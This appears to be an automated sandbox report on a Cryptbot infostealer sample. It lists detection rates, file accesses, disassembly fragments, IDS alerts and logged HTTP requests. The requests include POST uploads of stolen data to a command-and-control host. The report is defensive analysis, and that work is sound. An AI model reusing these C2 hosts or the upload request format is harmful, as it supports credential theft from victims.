Source: C:\Users\user\AppData\Local\Temp\cKVHNxTLdXDmoFXuLNoh.dll |
ReversingLabs: Detection: 36% |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
ReversingLabs: Detection: 39% |
Source: UfRKIdsNvD.exe |
ReversingLabs: Detection: 28% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 9_2_00EF15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
9_2_00EF15B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 9_2_6C8414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
9_2_6C8414B0 |
Source: UfRKIdsNvD.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED |
Source: UfRKIdsNvD.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\UfRKIdsNvD.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\Desktop\UfRKIdsNvD.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\UfRKIdsNvD.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\Desktop\UfRKIdsNvD.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\UfRKIdsNvD.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\Desktop\UfRKIdsNvD.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
9_2_00EF81E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C8BAC70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C8BAD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C8BAD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
9_2_6C8E2EF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C85AF80 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C91F960h |
9_2_6C85E8C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C86E490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C86E490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
9_2_6C8E04E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C8604F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C860610 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C86A790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C86A790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C86A720 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C860010 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6C91D014h] |
9_2_6C914110 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C86C2C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C864203 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
9_2_6C8E8250 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C86A3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C86A3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C86A330 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C8BBDF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
9_2_6C899F90 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C8BBF50 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C87B987 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C87B98B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C8F9900 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C899910 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C8BBAC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C8B7AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
9_2_6C86D424 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C91DFF4h |
9_2_6C8B3440 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
9_2_6C86D5A4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
9_2_6C8B35F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
9_2_6C86D724 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C86D050 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
9_2_6C8D7100 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C8BB280 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C86D2B4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
9_2_6C8B93B0 |
Source: chrome.exe |
Memory has grown: Private usage: 1MB later: 28MB |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49710 -> 46.173.214.92:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49711 -> 46.173.214.92:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49725 -> 46.173.214.92:80 |
Source: global traffic |
HTTP traffic detected: GET /MwOBqdodAGbyXMofAyrU1729862659 HTTP/1.1Host: home.thirtji13ht.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: thirtji13ht.topAccept: */*Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------dWKzWvr0dgLyI6mpvLcUlWData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 57 4b 7a 57 76 72 30 64 67 4c 79 49 36 6d 70 76 4c 63 55 6c 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 75 6d 6f 64 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a8 4a 97 83 ec 54 27 10 69 c8 0a 9f 5b 66 4f a2 9e 0f ee 9d c7 8e e5 e9 29 dd 51 78 1c 00 f6 b5 16 c2 2c 45 12 0e 59 da 80 8f 1d 90 01 a9 9e 4b c3 78 54 aa 45 bd 54 8a 61 f6 54 97 94 7a 61 c4 33 2c 18 b5 ab 91 2f 5d 5a db d1 d8 5c 82 3a 5f 01 95 33 3e 18 71 9d 51 59 71 92 65 57 27 91 5e 7b 96 e6 dd 8d cf 1e e8 15 8a 3f 98 b6 35 6f f5 d2 1d cc 0f 17 67 9e 4b e8 1b 7c 39 ea 16 1a 34 4f 95 08 a7 48 ba 4d b0 23 c9 0c e0 17 b1 95 cd 4b 24 bf 75 02 4a c4 3e c9 3f dc 6e 77 c3 25 16 06 d2 0d d8 23 bb f5 a7 e4 83 f9 f8 11 b1 a7 9a b9 d6 a2 12 df b8 5b b4 6d 77 77 4a 23 e8 fb 8b f2 d3 00 f7 17 32 ca 97 55 60 1a de e5 da 73 9d 46 a0 ce 06 dd 4b d5 c3 5b d3 6f 9e 79 e1 01 21 91 59 aa eb 63 51 b6 26 5f 30 ca 19 fd 0a 3f ec 5f 67 9b 53 2a 02 c5 e7 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 57 4b 7a 57 76 72 30 64 67 4c 79 49 36 6d 70 76 4c 63 55 6c 57 2d 2d 0d 0a Data Ascii: --------------------------dWKzWvr0dgLyI6mpvLcUlWContent-Disposition: form-data; name="file"; filename="Tumodi.bin"Content-Type: application/octet-streamJT'i[fO)Qx,EYKxTETaTza3,/]Z\:_3>qQYqeW'^{?5ogK|94OHM#K$uJ>?nw%#[mwwJ#2U`sFK[oy!YcQ&_0?_gS*--------------------------dWKzWvr0dgLyI6mpvLcUlW-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: thirtji13ht.topAccept: */*Content-Length: 76780Content-Type: multipart/form-data; boundary=------------------------sT5mtL2qJiDJe4zJXDDk03Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 73 54 35 6d 74 4c 32 71 4a 69 44 4a 65 34 7a 4a 58 44 44 6b 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 75 72 75 66 6f 70 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 7f aa 63 27 3e 59 e6 b8 29 2f c4 54 f6 a2 1a ef 93 90 bd 44 b0 c0 d0 a4 0d 34 5d ae e4 e6 37 31 f9 ca 66 d4 8a 47 77 f2 37 ab 19 32 1c 29 12 52 ab 25 54 ea 5b af 97 9a b2 32 85 cd 36 cb 4f 72 9f ab a0 b7 49 48 90 21 78 61 60 07 9c ce 59 05 c8 f9 60 96 3a 2d 9d a8 56 89 69 7a 60 c7 38 1b 5e bd a1 b8 3f 8e 7a 10 91 b8 cd f8 db f0 47 3e 59 f1 fe cf 08 52 24 d5 7c 4e b4 53 91 39 5a a5 8c d6 8f 1a 94 96 1f 78 65 ff 1d 38 36 63 90 75 7b 6c 99 a8 b2 04 84 57 d8 97 44 6a 25 42 81 d9 29 c6 56 db c0 d5 f7 dd 89 cf 5c 13 e3 96 9d 3c 77 96 06 bc 69 18 64 8c 1e a1 d2 ef c5 02 1d f3 bd 3b 93 7e 1b a3 42 92 64 2e af f3 7c 30 76 29 0d 42 6a 83 92 d3 4a f5 ab be fe 72 76 2b 7a 14 83 d6 fc 93 21 22 e9 d1 38 b0 33 8a ae df 6a e9 b9 be c6 c7 57 45 38 2d 90 08 e7 5c 1f a6 0a 6d d1 68 c7 3a 42 2a fa 69 d8 09 32 f9 e8 e0 04 ec c1 7e c3 61 de 7c 95 22 cb de ea 29 97 04 9d 33 2b 45 e4 10 af 58 8d 71 cf 98 c6 06 44 5e 63 29 33 df fe cb 71 ff 68 8c 6e 17 0e a8 b3 91 6f 62 3f 4d 7f d7 8f 8a 6a f7 59 d3 c4 b8 bb d7 fd a5 75 bd bc 11 dc 0b d8 d1 ba af 54 a4 37 25 fe 02 94 3e fa 77 68 8e f3 e8 60 d1 88 16 ca 6c d4 d3 c8 53 9c f6 91 2e 30 aa 3e c7 92 13 a6 7f 5f 4e 34 4b 2f 81 4a 1d a0 d6 47 7d 8e c4 1d 4a 4b f9 f6 93 26 55 5a ba 94 2b a6 ef 3b 03 c7 26 2e fc aa 9d 7e 4f 69 e8 22 ef d3 02 bd fd 80 16 12 ae 74 88 8f 74 52 16 a2 bf ae 7a 5f 03 3d 43 23 f6 2d 96 6f 7c 56 ea 47 d0 99 6c 73 3c a7 6b ea c8 2a 82 c5 ba 23 99 dd 60 ad 18 4e c8 7c 46 e6 70 7e 79 e4 ef 3e e7 54 6c 0e 92 ba de e4 65 08 a1 f0 6c f0 ce 53 28 53 3a 9f 37 fd 0b 3f 76 5f 9a a8 a1 fd 6d 8e d5 08 07 96 05 bd c6 a6 4f 1a 4b e2 98 cd 77 fd 66 a7 88 d9 81 09 4c ba 56 e8 64 df f1 02 04 25 d1 1a c8 91 88 8e 83 dd db c6 79 e4 40 1d a6 7e 47 9a 80 cc db ae e0 c8 72 1e 02 6b f4 4c cd 4a ac 15 d2 99 0e e5 59 67 d4 3d 36 b5 cd a |